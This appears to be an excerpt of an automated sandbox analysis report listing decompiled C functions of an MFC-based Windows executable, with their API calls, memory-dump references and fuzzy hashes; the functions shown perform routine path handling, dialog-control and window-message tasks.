    • #4055.MFC42(00000422,00000488,00000487,00000421,0000047E), ref: 0041F3F0
    • #5162.MFC42(00000422,00000488,00000487,00000421,0000047E), ref: 0041F3FC
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #4055$#5162
    • String ID:
    • API String ID: 3043833971-0
    • Opcode ID: 37af21469b6627142f55fca8591be05328b53c68892464db9da3eefa931cbdff
    • Instruction ID: 0dc3e2e28399c74215925a8af3094a25e5e0d025d9fe8b8869d4568a39b832fd
    • Opcode Fuzzy Hash: 37af21469b6627142f55fca8591be05328b53c68892464db9da3eefa931cbdff
    • Instruction Fuzzy Hash: 77016770B44F10EAD6146B25B86577D2595E748716F70103FA5014B6D2DBFC84868B4C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E004280F9(void* __ecx) {
    				signed int _t14;
    				signed int _t15;
    				intOrPtr _t21;
    				void* _t24;
    
    				_t24 = __ecx;
    				_push(0x103);
    				_push( *((intOrPtr*)(__ecx + 0xd4)) + 0x150);
    				_push(0x494);
    				L0043E066();
    				L0043E006();
    				_t14 = lstrlenA( *((intOrPtr*)(__ecx + 0xd4)) + 0x150);
    				if(_t14 != 0) {
    					_t14 = _t14 - 1;
    					if(_t14 != 0) {
    						_t21 =  *((intOrPtr*)(_t24 + 0xd4));
    						if( *((char*)(_t21 + _t14 + 0x150)) != 0x5c) {
    							_t14 = lstrcatA(_t21 + 0x150, 0x4545a8);
    						}
    					}
    				}
    				_push(0x493);
    				L0043DFA6();
    				_t15 = _t14 & 0xffffff00 | _t14 != 0x00000000;
    				 *( *((intOrPtr*)(_t24 + 0xd4)) + 0x14d) = _t15;
    				L0043E03C();
    				return _t15;
    			}

    Instruction addresses: 0x004280fa, 0x00428108, 0x0042810f, 0x00428110, 0x00428115, 0x0042811c, 0x0042812a, 0x00428132, 0x00428134, 0x00428135, 0x00428137, 0x00428145, 0x0042814f, 0x0042814f, 0x00428145, 0x00428135, 0x00428155, 0x0042815c, 0x00428169, 0x0042816c, 0x00428174, 0x0042817b

    APIs
    • #3092.MFC42(00000494,?,00000103), ref: 00428115
    • #3873.MFC42(00000494,?,00000103), ref: 0042811C
    • lstrlenA.KERNEL32(?,00000494,?,00000103), ref: 0042812A
    • lstrcatA.KERNEL32(?,004545A8), ref: 0042814F
    • #4055.MFC42(00000493), ref: 0042815C
    • #4853.MFC42(00000493), ref: 00428174
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3092#3873#4055#4853lstrcatlstrlen
    • String ID:
    • API String ID: 2041594060-0
    • Opcode ID: 919a86e20e2a5d41e8434c062e957642e4582657f8e03f6ea429c70022980ed3
    • Instruction ID: f86850fafda89df5b6a60dc634866d5acbdf4634ab12ec0e2c5882dc51451cfc
    • Opcode Fuzzy Hash: 919a86e20e2a5d41e8434c062e957642e4582657f8e03f6ea429c70022980ed3
    • Instruction Fuzzy Hash: E1F0A4617016109BD73857A6ED09FAF265A8BC4705F08042EA2058A3C1DABC9801C728
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0042A6AA(CHAR* _a4, signed int _a8, signed int _a12) {
    				char _v264;
    				int _t19;
    				void* _t34;
    
    				GetModuleFileNameA(0,  &_v264, 0x103);
    				_t19 = lstrlenA( &_v264);
    				 *(_t34 + _t19 - lstrlenA( *(0x454cc8 + _a12 * 4)) - 0x104) =  *(_t34 + _t19 - lstrlenA( *(0x454cc8 + _a12 * 4)) - 0x104) & 0x00000000;
    				lstrcatA( &_v264,  *(0x454cc8 + _a8 * 4));
    				return lstrcpyA(_a4,  &((strrchr( &_v264, 0x5c))[1]));
    			}

    Instruction addresses: 0x0042a6c3, 0x0042a6d6, 0x0042a6f2, 0x0042a701, 0x0042a726

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 0042A6C3
    • lstrlenA.KERNEL32(?), ref: 0042A6D6
    • lstrlenA.KERNEL32 ref: 0042A6E4
    • lstrcatA.KERNEL32(00000000), ref: 0042A701
    • strrchr.MSVCRT ref: 0042A710
    • lstrcpyA.KERNEL32(?,00000001), ref: 0042A71D
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: lstrlen$FileModuleNamelstrcatlstrcpystrrchr
    • String ID:
    • API String ID: 1820563544-0
    • Opcode ID: 3c7b2a7acd7e6e49e397a5feaf6414426f3b1127d66c0ea546b2bdf0dab544e4
    • Instruction ID: fb68a417a9bb70393b914a17b714521400adcb08387af2e42271ac6b7d06c342
    • Opcode Fuzzy Hash: 3c7b2a7acd7e6e49e397a5feaf6414426f3b1127d66c0ea546b2bdf0dab544e4
    • Instruction Fuzzy Hash: 21016DBA500158AFDB10EFA8EC49FDA7BBCEB96316F010171FB48D70A0D6B099958F50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041BDFD(struct HWND__* _a4, int _a8) {
    				void* _t6;
    				struct HWND__* _t10;
    				long _t11;
    
    				_t10 = _a4;
    				_t11 = GetWindowLongA(_t10, 0xfffffff4);
    				if(_t11 != 0x472) {
    					if(_t11 == 0x497 || _t11 == 0x496) {
    						if(IsDlgButtonChecked(GetParent(_t10), 0x473) == 0) {
    							goto L6;
    						}
    					} else {
    						L6:
    						if(_t11 != 0x46a) {
    							goto L7;
    						}
    					}
    				} else {
    					if(IsDlgButtonChecked(GetParent(_t10), 0x470) != 0) {
    						L7:
    						EnableWindow(_t10, _a8);
    					} else {
    					}
    				}
    				_t6 = 1;
    				return _t6;
    			}

    Instruction addresses: 0x0041bdff, 0x0041be0c, 0x0041be14, 0x0041be35, 0x0041be54, 0x00000000, 0x00000000, 0x0041be56, 0x0041be56, 0x0041be5c, 0x00000000, 0x00000000, 0x0041be5c, 0x0041be16, 0x0041be2b, 0x0041be5e, 0x0041be63, 0x00000000, 0x0041be2d, 0x0041be2b, 0x0041be6b, 0x0041be6e

    APIs
    • GetWindowLongA.USER32 ref: 0041BE06
    • GetParent.USER32(?), ref: 0041BE1C
    • IsDlgButtonChecked.USER32(00000000), ref: 0041BE23
    • GetParent.USER32(?), ref: 0041BE45
    • IsDlgButtonChecked.USER32(00000000), ref: 0041BE4C
    • EnableWindow.USER32(?,?), ref: 0041BE63
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: ButtonCheckedParentWindow$EnableLong
    • String ID:
    • API String ID: 3409643953-0
    • Opcode ID: ec3773c02020bc5fc53f086ff6299f3d7338812065cb027a3f934adf3cfbdfce
    • Instruction ID: 7a2417e5a3887355a066d28c0932c8caff54f6e582b5bf12f7633fb56270947d
    • Opcode Fuzzy Hash: ec3773c02020bc5fc53f086ff6299f3d7338812065cb027a3f934adf3cfbdfce
    • Instruction Fuzzy Hash: 0DF036BA905310ABDA202BB4AC4CBEF6668E7D6711F01853BF755E61A0C728488167DE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00420679(void* __ecx) {
    				void* _t19;
    				signed int _t30;
    				void* _t32;
    
    				_t19 = E0043E4E0(0x441f07, _t32);
    				 *(_t32 - 0x14) =  *(_t32 - 0x14) & 0x00000000;
    				_push( *((intOrPtr*)(_t32 + 0xc)));
    				L0043DE26();
    				_t30 = 1;
    				_push(0x5c);
    				 *(_t32 - 4) = _t30;
    				L0043DFB8();
    				if(_t19 != 0xffffffff) {
    					_push(_t19 + 1);
    					_push( *((intOrPtr*)(_t32 + 8)));
    					L0043DFB2();
    					 *(_t32 - 0x14) = _t30;
    				} else {
    					_push( *((intOrPtr*)(_t32 + 0xc)));
    					L0043DE26();
    					 *(_t32 - 0x14) = _t30;
    				}
    				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
    				return  *((intOrPtr*)(_t32 + 8));
    			}

    Instruction addresses: 0x0042067e, 0x00420685, 0x0042068a, 0x00420690, 0x0042069a, 0x0042069b, 0x0042069d, 0x004206a0, 0x004206a8, 0x004206be, 0x004206bf, 0x004206c2, 0x004206c7, 0x004206aa, 0x004206aa, 0x004206b0, 0x004206b5, 0x004206b5, 0x004206ca, 0x004206d1, 0x004206dd, 0x004206e5

    APIs
    • __EH_prolog.LIBCMT ref: 0042067E
    • #537.MFC42(00000008,74B48170,?,?,00420500,?,00000008,?,?,?), ref: 00420690
    • #5683.MFC42(0000005C,00000008,74B48170,?,?,00420500,?,00000008,?,?,?), ref: 004206A0
    • #537.MFC42(00000008,0000005C,00000008,74B48170,?,?,00420500,?,00000008,?,?,?), ref: 004206B0
    • #4277.MFC42(?,00000001,0000005C,00000008,74B48170,?,?,00420500,?,00000008,?,?,?), ref: 004206C2
    • #800.MFC42(?,00000001,0000005C,00000008,74B48170,?,?,00420500,?,00000008,?,?,?), ref: 004206D1
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537$#4277#5683#800H_prolog
    • String ID:
    • API String ID: 84380077-0
    • Opcode ID: 4ffa33b561a4ba27e4cc31c1d8285ab76e1dc93f4118b1d69c09df7a61004fe6
    • Instruction ID: b22c18198c0013c2273cd41f76d89bdd74f07319dc2c7189c6d7d5fc1992d85c
    • Opcode Fuzzy Hash: 4ffa33b561a4ba27e4cc31c1d8285ab76e1dc93f4118b1d69c09df7a61004fe6
    • Instruction Fuzzy Hash: C0014631900129EBDB15EF51D942BEEBB30FF18328F10920EB4226A2D1CB785A04CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E0040325A(intOrPtr* __ecx) {
    				void* _t22;
    				void* _t23;
    				void* _t35;
    
    				E0043E4E0(E0043EE44, _t35);
    				_push(_t35 - 0xd8);
    				_push( *((intOrPtr*)(_t35 + 8)));
    				 *((intOrPtr*)( *__ecx + 0x20))();
    				_t22 = _t35 - 0xd8;
    				_push(_t22);
    				L0043DE26();
    				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
    				_push(0x4532cc);
    				_push(_t22);
    				_t23 = _t35 + 8;
    				_push(_t23);
    				L0043DE20();
    				_push(_t23);
    				 *(_t35 - 4) = 1;
    				L0043DE1A();
    				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
    				L0043DD36();
    				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
    				return _t23;
    			}

    Instruction addresses: 0x0040325f, 0x00403275, 0x00403276, 0x0040327b, 0x0040327e, 0x00403287, 0x00403288, 0x0040328d, 0x00403291, 0x00403296, 0x00403297, 0x0040329a, 0x0040329b, 0x004032a0, 0x004032a4, 0x004032a8, 0x004032ad, 0x004032b4, 0x004032b9, 0x004032c0, 0x004032c9, 0x004032d1

    APIs
    • __EH_prolog.LIBCMT ref: 0040325F
    • #537.MFC42(?), ref: 00403288
    • #924.MFC42(?,00000000,004532CC,?), ref: 0040329B
    • #939.MFC42(00000000,?,00000000,004532CC,?), ref: 004032A8
    • #800.MFC42(00000000,?,00000000,004532CC,?), ref: 004032B4
    • #800.MFC42(00000000,?,00000000,004532CC,?), ref: 004032C0
    Memory Dump Source
    • Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#924#939H_prolog
    • String ID:
    • API String ID: 637726327-0
    • Opcode ID: dd59b32fece5850020e59c0b2d3f2d76185f90b7094dcba899eb63becd1a8088
    • Instruction ID: 2127a0f9e1199256b59702e538b6bbfc2c294042f1613ea291c984e93a012e33
    • Opcode Fuzzy Hash: dd59b32fece5850020e59c0b2d3f2d76185f90b7094dcba899eb63becd1a8088
    • Instruction Fuzzy Hash: DE018F72900119EBCB15EFA0C946BDEBB78AF18318F00469EB416631C1DB785B08CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E00419198(void* __eax, void* __ecx) {
    				long _t3;
    
    				_push(0x442);
    				L0043E066();
    				_t3 = SendMessageA( *(__eax + 0x20), 0x402, 0, 0);
    				if(_t3 == 0) {
    					_push(_t3);
    					_push(0x4e26);
    					L0043DF82();
    					_push(0xffffffff);
    					_push(0x40);
    					_push(0xe027);
    					L0043E2CA();
    					_push(0x442);
    					L0043E066();
    					L0043DF9A();
    					return _t3;
    				}
    				return _t3;
    			}

    Instruction addresses: 0x004191a1, 0x004191a2, 0x004191b3, 0x004191bb, 0x004191bd, 0x004191be, 0x004191c5, 0x004191ca, 0x004191cc, 0x004191ce, 0x004191d3, 0x004191d8, 0x004191db, 0x004191e2, 0x00000000, 0x004191e2, 0x004191e9

    APIs
    • #3092.MFC42(00000442), ref: 004191A2
    • SendMessageA.USER32(?,00000402,00000000,00000000), ref: 004191B3
    • #1779.MFC42(00004E26,00000000), ref: 004191C5
    • #1199.MFC42(0000E027,00000040,000000FF,00004E26,00000000), ref: 004191D3
    • #3092.MFC42(00000442,0000E027,00000040,000000FF,00004E26,00000000), ref: 004191DB
    • #5981.MFC42(00000442,0000E027,00000040,000000FF,00004E26,00000000), ref: 004191E2
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3092$#1199#1779#5981MessageSend
    • String ID:
    • API String ID: 2520177310-0
    • Opcode ID: af0d95109230e5188592ff9847262d82982841f5a88fca12c1279020c98e0f10
    • Instruction ID: 04c1b6eb81eea36406318f166dc8798189d026773844d55e561479d89cacf9c6
    • Opcode Fuzzy Hash: af0d95109230e5188592ff9847262d82982841f5a88fca12c1279020c98e0f10
    • Instruction Fuzzy Hash: 9EE09AA0B4022176F9242327AD0BF2E1428AB85F24F00122FB306BA1E2D9E85D01012D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00418A07(intOrPtr __ecx) {
    				void* __esi;
    				void* _t35;
    				void* _t37;
    				void* _t38;
    				void* _t39;
    				void* _t41;
    				void* _t42;
    				intOrPtr* _t60;
    				intOrPtr* _t61;
    				intOrPtr _t67;
    				void* _t69;
    
    				E0043E4E0(0x440fbd, _t69);
    				_push(__ecx);
    				_push(__ecx);
    				_t67 = __ecx;
    				 *((intOrPtr*)(_t69 - 0x10)) = __ecx;
    				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
    				_t60 = __ecx + 0x44c;
    				 *((intOrPtr*)(_t69 - 0x14)) = _t60;
    				 *_t60 = 0x445440;
    				 *(_t69 - 4) = 7;
    				L0043DD72();
    				 *_t60 = 0x44547c;
    				_t61 = __ecx + 0x444;
    				 *((intOrPtr*)(_t69 - 0x14)) = _t61;
    				 *_t61 = 0x445440;
    				 *(_t69 - 4) = 8;
    				L0043DD72();
    				 *_t61 = 0x44547c;
    				_t62 = __ecx + 0x330;
    				 *((intOrPtr*)(_t69 - 0x14)) = __ecx + 0x330;
    				 *(_t69 - 4) = 9;
    				_t35 = L00403FBC(__ecx + 0x40c);
    				 *(_t69 - 4) = 4;
    				L00404083(_t35, _t62, _t67);
    				_t63 = _t67 + 0x21c;
    				 *((intOrPtr*)(_t69 - 0x14)) = _t67 + 0x21c;
    				 *(_t69 - 4) = 0xa;
    				_t37 = L00403FBC(_t67 + 0x2f8);
    				 *(_t69 - 4) = 3;
    				_t38 = L00404083(_t37, _t63, _t67);
    				 *(_t69 - 4) = 2;
    				_t39 = L00404F36(_t38, _t67 + 0x1c8, _t67);
    				 *(_t69 - 4) = 1;
    				L00404F36(_t39, _t67 + 0x174, _t67);
    				_t64 = _t67 + 0x60;
    				 *((intOrPtr*)(_t69 - 0x14)) = _t67 + 0x60;
    				 *(_t69 - 4) = 0xb;
    				_t41 = L00403FBC(_t67 + 0x13c);
    				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
    				_t42 = L00404083(_t41, _t64, _t67);
    				 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
    				L0043E04E();
    				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
    				return _t42;
    			}

    Instruction addresses, one per line of the C-code above (0x00000000 where the decompiler attached no instruction to that line):
    0x00418a0c
    0x00418a11
    0x00418a12
    0x00418a15
    0x00418a18
    0x00418a1b
    0x00418a1f
    0x00418a25
    0x00418a28
    0x00418a30
    0x00418a34
    0x00418a3e
    0x00418a40
    0x00418a46
    0x00418a49
    0x00418a51
    0x00418a55
    0x00418a5a
    0x00418a5c
    0x00418a62
    0x00418a6b
    0x00418a6f
    0x00418a76
    0x00418a7a
    0x00418a7f
    0x00418a85
    0x00418a8e
    0x00418a92
    0x00418a99
    0x00418a9d
    0x00418aa8
    0x00418aac
    0x00418ab7
    0x00418abb
    0x00418ac0
    0x00418ac3
    0x00418acc
    0x00418ad0
    0x00418ad5
    0x00418adb
    0x00418ae0
    0x00418ae6
    0x00418af1
    0x00418af9

    APIs
    • __EH_prolog.LIBCMT ref: 00418A0C
    • #2414.MFC42(?,?,?,?,?,004189F3), ref: 00418A34
    • #2414.MFC42(?,?,?,?,?,004189F3), ref: 00418A55
    • #641.MFC42(?,?,?,?,?,004189F3), ref: 00418AE6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2414$#641H_prolog
    • String ID: |TD
    • API String ID: 4010925728-231495167
